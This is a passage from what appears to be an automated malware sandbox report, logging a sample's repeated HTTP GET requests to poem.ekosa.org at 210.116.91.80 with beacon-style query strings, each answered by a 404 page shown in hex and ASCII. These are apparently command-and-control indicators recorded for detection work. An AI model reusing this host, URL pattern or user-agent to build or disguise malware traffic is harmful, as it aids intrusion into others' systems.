      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:40.653165102 CET5338INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:39 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      282192.168.2.450062210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:41.034111977 CET5339OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:41.291224003 CET5340INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:41 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      283192.168.2.450063210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:41.556370974 CET5340OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:41.816778898 CET5341INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:41 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      284192.168.2.450064210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:42.086652040 CET5342OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:42.348958969 CET5342INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:42 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      29192.168.2.449793210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:14.233062029 CET436OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:14.494489908 CET455INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:13 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      3192.168.2.449761210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:58.403862000 CET101OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:58.668386936 CET106INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:57 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      30192.168.2.449796210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:14.876337051 CET463OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:15.145694017 CET463INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:15 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      31192.168.2.449797210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:15.415507078 CET464OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:15.679867029 CET464INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:15 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      32192.168.2.449798210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:15.947823048 CET465OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:16.212260962 CET466INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:16 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      33192.168.2.449799210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:16.591037035 CET466OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:16.858326912 CET467INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:16 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      34192.168.2.449800210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:17.132344007 CET468OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:17.399684906 CET468INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:17 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
